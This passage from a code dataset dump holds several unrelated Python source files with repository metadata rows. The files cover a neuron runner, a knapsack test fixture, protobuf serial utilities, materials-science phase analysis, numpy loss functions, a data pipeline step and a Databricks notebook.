    neuron = Neuron(config, dendrite, nucleus, metagraph)
    neuron.serve()

    # Start timed calls.
    tl = Timeloop()
    set_timed_loops(tl, config, neuron, metagraph)
    tl.start(block=False)
    logger.info('Started Timers.')

    def tear_down(_config, _neuron, _dendrite, _nucleus, _metagraph):
        # Drop all references so the components can be garbage-collected.
        logger.debug('tear down.')
        del _neuron
        del _dendrite
        del _nucleus
        del _metagraph
        del _config

    try:
        # Keep the process alive; all real work happens on the timer jobs.
        logger.info('Begin wait on main...')
        while True:
            logger.debug('heartbeat')
            time.sleep(100)
    except KeyboardInterrupt:
        logger.debug('Neuron stopped with keyboard interrupt.')
        tear_down(config, neuron, dendrite, nucleus, metagraph)
    except Exception as e:
        logger.error('Neuron stopped with interrupt on error: ' + str(e))
        tear_down(config, neuron, dendrite, nucleus, metagraph)
# Script entry point.
if __name__ == '__main__':
    logger.debug("started neuron.")
    main()
| 28.609929 | 83 | 0.589737 | 428 | 4,034 | 5.446262 | 0.306075 | 0.030888 | 0.022308 | 0.037752 | 0.424281 | 0.346203 | 0.333762 | 0.246246 | 0.1716 | 0.1716 | 0 | 0.014931 | 0.302677 | 4,034 | 140 | 84 | 28.814286 | 0.813722 | 0.463312 | 0 | 0.035088 | 0 | 0 | 0.074905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5ee0a1b58d18c70bdda71d41120500488aa7c66 | 897 | py | Python | miplearn/tests/__init__.py | GregorCH/MIPLearn | 28e2ba7c0133602fb361f8690bc7424869f68b43 | [
"BSD-3-Clause"
] | null | null | null | miplearn/tests/__init__.py | GregorCH/MIPLearn | 28e2ba7c0133602fb361f8690bc7424869f68b43 | [
"BSD-3-Clause"
] | null | null | null | miplearn/tests/__init__.py | GregorCH/MIPLearn | 28e2ba7c0133602fb361f8690bc7424869f68b43 | [
"BSD-3-Clause"
] | null | null | null | # MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization
# Copyright (C) 2020, UChicago Argonne, LLC. All rights reserved.
# Released under the modified BSD license. See COPYING.md for more details.
from miplearn import LearningSolver
from miplearn.problems.knapsack import KnapsackInstance
def get_test_pyomo_instances():
    """Build and solve two small knapsack fixtures.

    Returns ``(instances, models)``: the KnapsackInstance objects and
    their corresponding Pyomo models, each already solved by a
    LearningSolver so tests can inspect solution data.
    """
    first = KnapsackInstance(
        weights=[23.0, 26.0, 20.0, 18.0],
        prices=[505.0, 352.0, 458.0, 220.0],
        capacity=67.0,
    )
    second = KnapsackInstance(
        weights=[25.0, 30.0, 22.0, 18.0],
        prices=[500.0, 365.0, 420.0, 150.0],
        capacity=70.0,
    )
    instances = [first, second]
    models = [instance.to_model() for instance in instances]
    solver = LearningSolver()
    for instance, model in zip(instances, models):
        solver.solve(instance, model)
    return instances, models
| 34.5 | 82 | 0.634337 | 115 | 897 | 4.913043 | 0.626087 | 0.042478 | 0.014159 | 0.035398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098361 | 0.251951 | 897 | 25 | 83 | 35.88 | 0.743666 | 0.244147 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5ee4943aac68235054c17ff1e0039fbf33c5e05 | 3,394 | py | Python | RPi/PBUtils.py | lefake/RPi-Arduino-PB-Communication | 8f827a4b8eaa331cd47d9a3f5bfa0414ec8c264f | [
"MIT"
] | null | null | null | RPi/PBUtils.py | lefake/RPi-Arduino-PB-Communication | 8f827a4b8eaa331cd47d9a3f5bfa0414ec8c264f | [
"MIT"
] | null | null | null | RPi/PBUtils.py | lefake/RPi-Arduino-PB-Communication | 8f827a4b8eaa331cd47d9a3f5bfa0414ec8c264f | [
"MIT"
] | null | null | null | from binascii import unhexlify
import threading
import time
# Serialization utils
class PBSerializationHandler:
    """Frame protobuf messages as ``<id|hexpayload;...>`` ASCII strings."""

    def __init__(self, msg_obj):
        # Mapping from message id to a reusable protobuf message instance
        # used as the parse target during deserialization.
        self._msg_obj = msg_obj

    def encode_msgs(self, ids, msgs):
        """Serialize parallel lists of ids and protobuf messages into one frame."""
        parts = ["<"]
        for id_msg, pb_msg in zip(ids, msgs):
            payload = bytearray(pb_msg.SerializeToString())
            # Two lowercase hex digits per byte, zero-padded.
            hex_payload = "".join(format(byte, "02x") for byte in payload)
            parts.append(str(id_msg) + "|" + hex_payload + ";")
        parts.append(">")
        return "".join(parts)

    def encode_msg(self, id, msg):
        """Serialize a single (id, message) pair."""
        return self.encode_msgs([id], [msg])

    def deserialize(self, messages):
        """Parse a framed byte string back into ``[id, message]`` pairs.

        Payloads are parsed into the shared instances from ``msg_obj``.
        """
        text = messages.decode("ascii")
        object_list = []
        # Strip the '<' '>' frame markers, then walk the ';'-separated parts.
        for part in text[1:-1].split(';'):
            if not part:
                continue
            msg_id, raw_msg = part.split("|")  # Find the id of the message
            msg_id = int(msg_id)
            obj = self._msg_obj[msg_id]
            obj.ParseFromString(unhexlify(raw_msg))
            object_list.append([msg_id, obj])
        return object_list
# Serial communication utils
class ArduinoReadHandler(threading.Thread):
    """Background thread that polls *readfunc* every *sleeptime* seconds.

    Polling can be paused/resumed via an Event and stopped permanently
    with :meth:`kill`.
    """

    def __init__(self, sleeptime, readfunc):
        threading.Thread.__init__(self)
        self._sleeptime = sleeptime
        self._readfunc = readfunc
        self._runflag = threading.Event()  # set -> polling enabled
        self._runflag.clear()
        self._run = True  # False -> worker loop exits

    def run(self):
        """Thread entry point: enable polling and enter the worker loop."""
        self._runflag.set()
        self.worker()

    def worker(self):
        """Poll until killed; skip the read while paused but keep sleeping."""
        while self._run:
            if self._runflag.is_set():
                self._readfunc()
            time.sleep(self._sleeptime)

    def pause(self):
        """Temporarily stop calling readfunc (the thread keeps running)."""
        self._runflag.clear()

    def resume(self):
        """Re-enable polling after a pause."""
        self._runflag.set()

    def running(self):
        """Return True while polling is enabled."""
        return self._runflag.is_set()

    def kill(self):
        """Ask the worker loop to exit after its current sleep."""
        self._run = False
class PBSerialHandler:
    """Owns a serial port plus a background reader for framed PB messages.

    Incoming frames (``<...>``) are read on a polling thread and handed to
    *callback*; outgoing messages are hex-framed via PBSerializationHandler.
    A simple ``_interlock`` flag keeps reads and writes from interleaving
    on the shared port.
    """

    def __init__(self, serial, callback, msg_obj, sleeptime=0.01):
        self._serial = serial
        self._sleeptime = float(sleeptime)
        self._callback = callback
        self._interlock = False   # True while the port is in use
        self._response = None     # last complete frame received
        self._serialization_handler = PBSerializationHandler(msg_obj)
        # Start polling the port immediately.
        self._worker = ArduinoReadHandler(self._sleeptime, self.read_callback)
        self._worker.start()

    def kill(self):
        # Stop the background reader thread.
        self._worker.kill()

    def read_callback(self):
        # Skip this poll if a write (or another read) currently holds the port.
        if not self._interlock:
            self._interlock = True
            try:
                input = self._serial.read()
                if input == b'<':
                    # Read the rest of the frame up to the '>' terminator.
                    buffer = self._serial.read_until(b'>')
                    self._serial.flush()
                    self._response = b'<' + buffer
                    self._callback(self._response)
            except Exception as e:
                print("Read call back error " + str(e))
            self._interlock = False

    def write_pb_msg(self, id, msg):
        """Encode and write a single protobuf message."""
        self.write_pb_msgs([id], [msg])

    def write_pb_msgs(self, ids, msgs):
        """Encode and write several protobuf messages as one frame."""
        encoded_msg = self._serialization_handler.encode_msgs(ids, msgs)
        # Wait for any in-flight read to finish before taking the port.
        # NOTE(review): this flag is not a real lock — two concurrent
        # writers could race here; confirm writers are single-threaded.
        while self._interlock:
            time.sleep(self._sleeptime)
        self._interlock = True
        self._serial.write(encoded_msg.encode("ascii"))
        self._serial.flush()
        self._interlock = False
| 27.819672 | 113 | 0.57749 | 389 | 3,394 | 4.784062 | 0.285347 | 0.041376 | 0.032241 | 0.013971 | 0.017195 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004316 | 0.317325 | 3,394 | 121 | 114 | 28.049587 | 0.798878 | 0.051267 | 0 | 0.170455 | 0 | 0 | 0.012449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.034091 | 0.022727 | 0.295455 | 0.011364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f095d1388f9625e63f8d8fbeb39317cd585f8c | 68 | py | Python | Python/Books/Learning-Programming-with-Python.Tamim-Shahriar-Subeen/chapter-009.01-list/ph-9.11-list-del-function.py | shihab4t/Books-Code | b637b6b2ad42e11faf87d29047311160fe3b2490 | [
"Unlicense"
] | null | null | null | Python/Books/Learning-Programming-with-Python.Tamim-Shahriar-Subeen/chapter-009.01-list/ph-9.11-list-del-function.py | shihab4t/Books-Code | b637b6b2ad42e11faf87d29047311160fe3b2490 | [
"Unlicense"
] | null | null | null | Python/Books/Learning-Programming-with-Python.Tamim-Shahriar-Subeen/chapter-009.01-list/ph-9.11-list-del-function.py | shihab4t/Books-Code | b637b6b2ad42e11faf87d29047311160fe3b2490 | [
"Unlicense"
] | null | null | null | li = [1, 2, 3, 3, 4, 5, 6]
del(li[1])
print(li)
del(li)
print(li)
| 8.5 | 26 | 0.5 | 17 | 68 | 2 | 0.529412 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 0.220588 | 68 | 7 | 27 | 9.714286 | 0.490566 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e5f0bb1e5a4c34450975dee81ee353ebb2c952b3 | 9,769 | py | Python | Old_Files/QuickPool_Old.py | PV-Lab/stability | d18da803a399a7c338b225b0d6adbdfe1b427707 | [
"MIT"
] | null | null | null | Old_Files/QuickPool_Old.py | PV-Lab/stability | d18da803a399a7c338b225b0d6adbdfe1b427707 | [
"MIT"
] | null | null | null | Old_Files/QuickPool_Old.py | PV-Lab/stability | d18da803a399a7c338b225b0d6adbdfe1b427707 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 4 18:07:03 2019
@author: NickT
"""
from pymatgen import MPRester
import pandas as pd
import matplotlib.pyplot as plt
import csv
import multiprocessing as mp
import pickle
import tqdm
import time
# --- Module-level setup (runs at import): load the Materials Project
# database dump and filter it down to "stable" phases.
mat_api_key = '<ENTER API KEY>'
mpr = MPRester(mat_api_key)

print("Loading Compounds....")
file = open('MPDatabase.pickle', 'rb')
all_compounds1 = pickle.load(file)

# Keep only entries whose site count matches the unit-cell formula total.
all_compounds = []
for compound in all_compounds1:
    if compound['nsites'] == sum(compound['unit_cell_formula'].values()):
        all_compounds.append(compound)

# Stability tolerance (meV above the convex hull), asked interactively.
criteria = float(input("Enter Stable Phase Criteria in meV: "))

#def find_stable_phases(compound):
#    '''
#    find all compounds with e_above_hull within given range of zero
#    '''
#    if abs(compound['e_above_hull']) < criteria/1000:
#        return compound

print('Finding Stable Phases....')
stable_phase = []
for compound in tqdm.tqdm(all_compounds): #find all compounds with e_above_hull within criteria of 0
    if abs(compound['e_above_hull']) < criteria/1000:
        stable_phase.append(compound)

#pool = mp.Pool(processes=1)
#
#stable_phase = list(tqdm.tqdm(pool.imap(find_stable_phases, all_compounds), total=86680))
######## COMPETING PHASE AND OXIDE CALCULATION ########
def find_comp(stable_oxides, compound_unit_cell, compound_formE, condition):
    '''
    Finds complementary oxide or competing phases group and associated total heat of oxidation.

    args:
        stable_oxides: list of dicts of stable oxides or competing phases with
            lower formation energy than original material
        compound_unit_cell: dict of elements in unit cell of original compound
        compound_formE: formation energy of original compound
        condition: 'Oxide' for complementary oxides; anything else for
            competing phases
    output:
        tuple: (list of dictionaries of predicted materials,
                combined formation energy of these materials (with appropriate ratios),
                difference of that energy vs. compound_formE,
                number of predicted materials,
                FinishEarly flag: True when atoms remained unaccounted for)
    notes:
        intersect_rank: used to find limiting element by finding ratio of
        normalised stoichiometry between original material and oxide.
        WARNING: mutates the dicts in stable_oxides in place (adds
        'el_weight', 'ranker', 'ranking_no'; deletes 'O' from 'el_weight'
        when condition == 'Oxide').
    '''
    result = []
    FinishEarly = False
    #what if positive formE
    orig_natoms = sum(compound_unit_cell.values())
    # Per-atom (normalised) stoichiometry of the original compound.
    compound_unit_cell1 = dict((a, b/orig_natoms) for a, b in compound_unit_cell.items()) #normalise stoichiometry
    for oxide in stable_oxides:
        oxide['el_weight'] = dict((a, b/oxide['nsites']) for a, b in oxide['unit_cell_formula'].items()) #normalise stoichiometry
        if condition == 'Oxide':
            # Oxygen is excluded from the matching for the oxide case.
            del oxide['el_weight']['O']
        oxide['ranker'] = dict((a, b/compound_unit_cell1[a]) for a, b in oxide['el_weight'].items()) #find greedy ranking parameter
        oxide['ranking_no'] = sum(oxide['ranker'].values())
    # Greedy order: lowest formation energy per unit of ranking parameter first.
    sort_oxides = sorted(stable_oxides, key = lambda oxide: (oxide['formation_energy_per_atom']/oxide['ranking_no']))
    sort_oxides1 = sort_oxides[:]
    total_formE = 0
    # NOTE(review): exact float '!= 0' comparison; tiny residuals keep the
    # loop alive until the candidate list empties — confirm intended.
    while sum(compound_unit_cell1.values()) != 0 and sort_oxides1 != []: #if all atoms in unit cell not yet accounted for
        oxide = sort_oxides1[0]
        intersection = list(set(oxide['elements']).intersection(compound_unit_cell1.keys()))
        if intersection == []:
            # Debug output: candidate shares no elements with the remainder.
            # NOTE(review): min() below raises ValueError in this case.
            print(compound_unit_cell)
            print(oxide['unit_cell_formula'])
            print(oxide['nsites'])
        intersect_rank = {}
        for element in intersection:
            intersect_rank[element] = compound_unit_cell1[element]/ oxide['el_weight'][element]
        limiting_element = min(intersect_rank, key=intersect_rank.get) #find limiting element
        ratio = intersect_rank[limiting_element] #(value)
        used_up_elements = []
        for element in intersection:
            compound_unit_cell1[element] = compound_unit_cell1[element] - (ratio * oxide['el_weight'][element])
            if abs(compound_unit_cell1[element]) < 0.0001: #inequality because of != 0 problem
                used_up_elements.append(element)
        result.append(oxide)
        sort_oxides1.remove(oxide)
        total_formE += oxide['formation_energy_per_atom']*ratio
        sort_oxides1 = [oxide for oxide in sort_oxides1 if
                        len(set(oxide['elements']).intersection(used_up_elements)) == 0]
        #remove oxides in list which arent useful (dont have new elements)
        if sort_oxides1 == [] and abs(sum(compound_unit_cell1.values())) > 0.0001: #inequality because of != 0 problem
            print(compound_unit_cell1)
            FinishEarly = True
    return (result, total_formE, total_formE-compound_formE, len(result), FinishEarly)
#### FOR TESTING FIND_OXIDES
# Inline smoke test with synthetic elements A/B/C: exercises find_comp's
# greedy decomposition on a toy system.  Return value is discarded; note
# that it runs (and mutates these dicts) at import time.
ABCO4 = {'elements': ['A', 'B', 'C', 'O'], 'formation_energy_per_atom': -750, 'nsites':7,
         'unit_cell_formula':{'A':1, 'B':1, 'C':1, 'O':4}}
AO = {'elements': ['A', 'O'], 'formation_energy_per_atom': -100, 'nsites':8,
      'unit_cell_formula':{'A':4, 'O':4}}
BO2 = {'elements': ['B', 'O'], 'formation_energy_per_atom': -100, 'nsites':6,
       'unit_cell_formula':{'B':2, 'O':4}}
C2O = {'elements': ['C', 'O'], 'formation_energy_per_atom': -300, 'nsites':24,
       'unit_cell_formula':{'C':16, 'O':8}}
A2BO6 = {'elements': ['A', 'B', 'O'], 'formation_energy_per_atom': -380, 'nsites':9,
         'unit_cell_formula':{'A':2, 'B':1, 'O':6}}
A2CO4 = {'elements': ['A', 'C', 'O'], 'formation_energy_per_atom': -620, 'nsites':63,
         'unit_cell_formula':{'A':18, 'C':9, 'O':36}}
original = {'A':4, 'B':8, 'C':10}
listt = [ABCO4, AO, BO2, C2O, A2BO6, A2CO4]
find_comp(listt, original, -400, 'Oxide')
####
def Make_Property_Dict(compound):
    '''
    Function to be iterated over all compounds: for a stable compound,
    collect its competing phases and oxides (from the module-level
    stable_phase list) plus the complementary decompositions computed by
    find_comp.  Returns the property dict, or None (implicitly) when the
    compound is outside the stability criteria.
    '''
    PDict = {}
    global stable_phase
    if abs(compound['e_above_hull']) < criteria/1000: #if stable
        #### FOR NUM PHASES
        competing_phases_id_withform1 = []
        competing_phase_no1 = 0
        comp_listdict =[]
        #### FOR NUM OXIDES
        v_ratio2 = 0
        oxide_no1 = 0
        oxides_id_withform1 = []
        v_ratio_id2 = 'n/a'
        oxide_listdict = []
        elements = compound['elements']
        for i in stable_phase:
            #### FOR NUM PHASES
            # Competing phase: built only from the compound's own elements.
            if set(i['elements']).issubset(elements):
                comp_listdict.append(i) #for find_comp
                if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']:
                    #find all other phases containing just those elements
                    competing_phase_no1 +=1
                    competing_phases_id_withform1.append(i['task_id'])
            #### FOR NUM OXIDES
            # Oxide: contains O plus a subset of the compound's elements,
            # and is not pure oxygen (O != nsites).
            if 'O' in i['elements']:
                el = i['elements'][:]
                el.remove('O')
                O = i['unit_cell_formula']['O']
                if set(el).issubset(elements) and O != i['nsites']:
                    oxide_listdict.append(i) #for find_comp
                    if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']:
                        oxide_no1 += 1
                        oxides_id_withform1.append(i['task_id'])
        #### FOR NUM PHASES
        PDict['task_id'] = compound['task_id']
        PDict['Formula'] = compound['pretty_formula']
        PDict['Bandgap /eV'] = compound['band_gap']
        PDict['Competing Phase Number (with formation E correction)'] = competing_phase_no1
        PDict['Competing Phase List (with formation E correction)'] = competing_phases_id_withform1
        y = find_comp(comp_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'NotOx')
        PDict['Complementary Competing Phase List'] = y[0]
        PDict['Complementary Heat of Decomposition'] = y[1]
        # NOTE(review): this key is assigned again in the oxide section below
        # and silently overwritten — confirm both values are not needed.
        PDict['Lower Formation Energy Than Original Material'] = y[2]
        PDict['Number of Complementary Phases'] = y[3]
        PDict['Early Finish1'] = y[4]
        #### FOR NUM OXIDES
        PDict['Number of Oxides (with formation E correction)'] = oxide_no1
        PDict['Oxide List (with formation E correction)'] = oxides_id_withform1
        x = find_comp(oxide_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'Oxide')
        PDict['Complementary Oxide List'] = x[0]
        PDict['Complementary Heat of Oxidation'] = x[1]
        PDict['Lower Formation Energy Than Original Material'] = x[2]
        PDict['Number of Complementary Oxides'] = x[3]
        PDict['Early Finish2'] = x[4]
        # Among the complementary oxides, find the one whose unit-cell
        # volume ratio to the original compound is closest to 1.
        v_ratio2 = 1000
        for i in x[0]:
            v2 = i['volume']/compound['volume']
            if abs(v2 - 1) < abs(v_ratio2 - 1):
                v_ratio2 = v2
                v_ratio_id2 = i
        # NOTE(review): these two assignments look swapped — the entry dict
        # is stored under 'Best Volume Ratio' and the numeric ratio under
        # 'ID of Best Volume Ratio'; confirm intended.
        PDict['Best Volume Ratio'] = v_ratio_id2
        PDict['ID of Best Volume Ratio'] = v_ratio2
        return PDict
if __name__ == '__main__':
    # Fan the per-compound property calculation out over 16 worker
    # processes; the context manager guarantees the pool is cleaned up
    # (the original never closed/joined it).
    with mp.Pool(processes=16) as pool:
        print('Calculating Data....')
        DictList = list(tqdm.tqdm(pool.imap(Make_Property_Dict, all_compounds), total=len(all_compounds)))
    FinalDF = pd.DataFrame(DictList)
    filename = 'FinalDF_' + str(criteria) + '.pckl'
    # `with` closes the file handle even if pickling raises (the original
    # leaked the handle on error).
    with open(filename, 'wb') as f:
        pickle.dump(FinalDF, f)
    print('Done.')
| 37.003788 | 131 | 0.604873 | 1,192 | 9,769 | 4.758389 | 0.234899 | 0.026798 | 0.044429 | 0.054302 | 0.234133 | 0.165903 | 0.130642 | 0.108075 | 0.050071 | 0.050071 | 0 | 0.026038 | 0.272699 | 9,769 | 263 | 132 | 37.144487 | 0.772273 | 0.193776 | 0 | 0.041667 | 0 | 0 | 0.21372 | 0.045472 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013889 | false | 0 | 0.055556 | 0 | 0.083333 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f19e16e2b08093649aea79bf01a6ebe7b3786c | 1,638 | py | Python | lhq_nn_lib/layers/loss.py | lhq1208/DL_lib | 53c99157efcc36f2288a82eedad09cdecda579e5 | [
"Apache-2.0"
] | null | null | null | lhq_nn_lib/layers/loss.py | lhq1208/DL_lib | 53c99157efcc36f2288a82eedad09cdecda579e5 | [
"Apache-2.0"
] | null | null | null | lhq_nn_lib/layers/loss.py | lhq1208/DL_lib | 53c99157efcc36f2288a82eedad09cdecda579e5 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from layers.activation_layer import *
from layers.gradient_check import *
def mean_square_error_loss(y_hat, y):
    """
    Mean-squared-error loss: loss = mean((y_hat - y)^2).

    :param y_hat: network predictions, shape (batch, num_output)
    :param y: target labels, same shape as y_hat
    :return: (scalar loss, gradient of the loss w.r.t. y_hat)
    """
    diff = y_hat - y
    loss = np.mean(diff ** 2)
    # NOTE(review): the gradient is scaled by 1/num_output only (not by the
    # batch size as well) -- preserved from the original implementation.
    grad = 2 * diff / y.shape[1]
    return loss, grad
def cross_entropy_loss(y_hat, y):
    """
    Cross-entropy loss: loss_i = -sum_j y_ij * log(y_hat_ij).

    :param y_hat: predicted class probabilities, shape (batch, classes)
    :param y: one-hot encoded labels, same shape as y_hat
    :return: (per-sample loss array, gradient of the loss w.r.t. y_hat)
    """
    per_sample_loss = -(y * np.log(y_hat)).sum(axis=1)
    grad = -(y / y_hat)
    return per_sample_loss, grad
def softmax_loss(x, y):
    """
    Softmax + cross-entropy loss computed from raw class scores.

    :param x: raw class scores, shape (N, C)
    :param y: integer class labels, shape (N,)
    :return: (mean loss over the batch, gradient of the loss w.r.t. x)
    """
    n = x.shape[0]
    rows = np.arange(n)
    # Shift each row by its max before exponentiating, for numerical
    # stability.
    shifted = x - x.max(axis=1, keepdims=True)
    log_partition = np.log(np.exp(shifted).sum(axis=1, keepdims=True))
    log_probs = shifted - log_partition
    loss = -log_probs[rows, y].sum() / n
    grad = np.exp(log_probs)
    grad[rows, y] -= 1
    grad /= n
    return loss, grad
if __name__ == '__main__':
    # Gradient check for softmax_loss: compare the analytic gradient
    # against a numeric one on small random scores.
    np.random.seed(231)
    n_classes, n_inputs = 10, 50
    scores = 0.001 * np.random.randn(n_inputs, n_classes)
    labels = np.random.randint(n_classes, size=n_inputs)

    numeric_grad = eval_numerical_gradient(
        lambda s: softmax_loss(s, labels)[0], scores, verbose=False)
    loss, analytic_grad = softmax_loss(scores, labels)

    # Loss should be ~2.3 (= log 10) and the gradient error ~1e-8.
    print('\nTesting softmax_loss:')
    print('loss: ', loss)
    print('dx error: ', rel_error(numeric_grad, analytic_grad))
| 27.762712 | 87 | 0.632479 | 276 | 1,638 | 3.557971 | 0.304348 | 0.040733 | 0.025458 | 0.039715 | 0.14664 | 0.089613 | 0.089613 | 0.089613 | 0.089613 | 0.089613 | 0 | 0.020586 | 0.228938 | 1,638 | 58 | 88 | 28.241379 | 0.756928 | 0.218559 | 0 | 0.060606 | 0 | 0 | 0.03843 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f2b2946d7fb399e25a69e9d6f0ee5cf294595b | 2,518 | py | Python | clearmash/prep_entities_for_search.py | Beit-Hatfutsot/mojp-dbs-pipelines | 7bac0da9c1777351f40f422c664a7168b52e218a | [
"MIT"
] | 1 | 2017-06-21T11:36:01.000Z | 2017-06-21T11:36:01.000Z | clearmash/prep_entities_for_search.py | Beit-Hatfutsot/mojp-dbs-pipelines | 7bac0da9c1777351f40f422c664a7168b52e218a | [
"MIT"
] | 66 | 2017-05-09T11:48:50.000Z | 2018-01-02T11:57:26.000Z | clearmash/prep_entities_for_search.py | Beit-Hatfutsot/mojp-dbs-pipelines | 7bac0da9c1777351f40f422c664a7168b52e218a | [
"MIT"
] | 2 | 2017-04-25T09:07:15.000Z | 2017-06-15T10:35:36.000Z | from datapackage_pipelines.wrapper import ingest, spew
from datapackage_pipelines.utilities.resources import PROP_STREAMING
from bs4 import BeautifulSoup
# Pull the pipeline parameters, the datapackage descriptor and the incoming
# streamed resources from the datapackage-pipelines wrapper.
parameters, datapackage, resources = ingest()
def get_resource():
    """
    Stream rows belonging to the configured collection that are allowed to
    be displayed, enriching each with plain-text versions of the HTML
    content fields.
    """
    collection = parameters["collection-name"]
    desc_field = "_c6_beit_hatfutsot_bh_base_template_description"

    def _strip_html(html):
        # Flatten the HTML body into whitespace-joined visible text.
        return ' '.join(BeautifulSoup(html, "lxml").findAll(text=True))

    for resource in resources:
        for row in resource:
            if row["collection"] != collection or not row["display_allowed"]:
                continue
            doc = row["parsed_doc"]
            names = doc.get("entity_name", {})
            descriptions = doc.get(desc_field, {})
            item = {
                "doc_id": "clearmash_{}".format(row["id"]),
                "source": "clearmash",
                "collection": collection,
                "title_he": names.get("he", ""),
                "title_en": names.get("en", ""),
                "content_html_he": descriptions.get("he", ""),
                "content_html_en": descriptions.get("en", ""),
            }
            item["content_text_he"] = _strip_html(item["content_html_he"])
            item["content_text_en"] = _strip_html(item["content_html_en"])
            yield item
# Declare the pipeline's single streamed output resource together with its
# tabular schema.  "es:index": False marks fields that downstream
# Elasticsearch loading should store but not index.
datapackage["resources"] = [{PROP_STREAMING: True,
                             "name": parameters["resource-name"],
                             "path": "{}.csv".format(parameters["resource-name"]),
                             "schema": {"fields": [{'name': 'doc_id', 'type': 'string', 'es:index': False},
                                                   {"name": "source", "type": "string", "es:index": False},
                                                   {"name": "collection", "type": "string", "es:index": False},
                                                   {"name": "title_he", "type": "string"},
                                                   {"name": "title_en", "type": "string"},
                                                   {"name": "content_html_he", "type": "string", "es:index": False},
                                                   {"name": "content_html_en", "type": "string", "es:index": False},
                                                   {"name": "content_text_he", "type": "string"},
                                                   {"name": "content_text_en", "type": "string"},],
                                        "primaryKey": ["doc_id"]}}]
# Emit the updated descriptor and the streamed rows to the next pipeline step.
spew(datapackage, [get_resource()])
| 61.414634 | 120 | 0.470612 | 221 | 2,518 | 5.126697 | 0.285068 | 0.079435 | 0.052957 | 0.075022 | 0.303619 | 0.213592 | 0.144748 | 0.086496 | 0.086496 | 0.086496 | 0 | 0.00189 | 0.369738 | 2,518 | 40 | 121 | 62.95 | 0.712035 | 0 | 0 | 0 | 0 | 0 | 0.26251 | 0.037331 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.090909 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f2df89ffd4743d543ef9c3d879f0b8408bef7f | 2,011 | py | Python | flight-data/adb_7_eda.py | plzm/azure-databricks | 29884a184698a034a7e5c25ac5b80d36757b2fff | [
"MIT"
] | null | null | null | flight-data/adb_7_eda.py | plzm/azure-databricks | 29884a184698a034a7e5c25ac5b80d36757b2fff | [
"MIT"
] | null | null | null | flight-data/adb_7_eda.py | plzm/azure-databricks | 29884a184698a034a7e5c25ac5b80d36757b2fff | [
"MIT"
] | null | null | null | # Databricks notebook source
# MAGIC %md
# MAGIC References
# MAGIC
# MAGIC https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrameStatFunctions<br>
# MAGIC https://docs.azuredatabricks.net/user-guide/visualizations/index.html<br>
# COMMAND ----------
# MAGIC %md
# MAGIC #### Get a dataframe for notebook tasks
# COMMAND ----------
# MAGIC %run ./adb_3_ingest_to_df
# COMMAND ----------
# MAGIC %md
# MAGIC ### Data exploration
# COMMAND ----------
df_flights_full.printSchema()
# COMMAND ----------
df_flights_full.count()
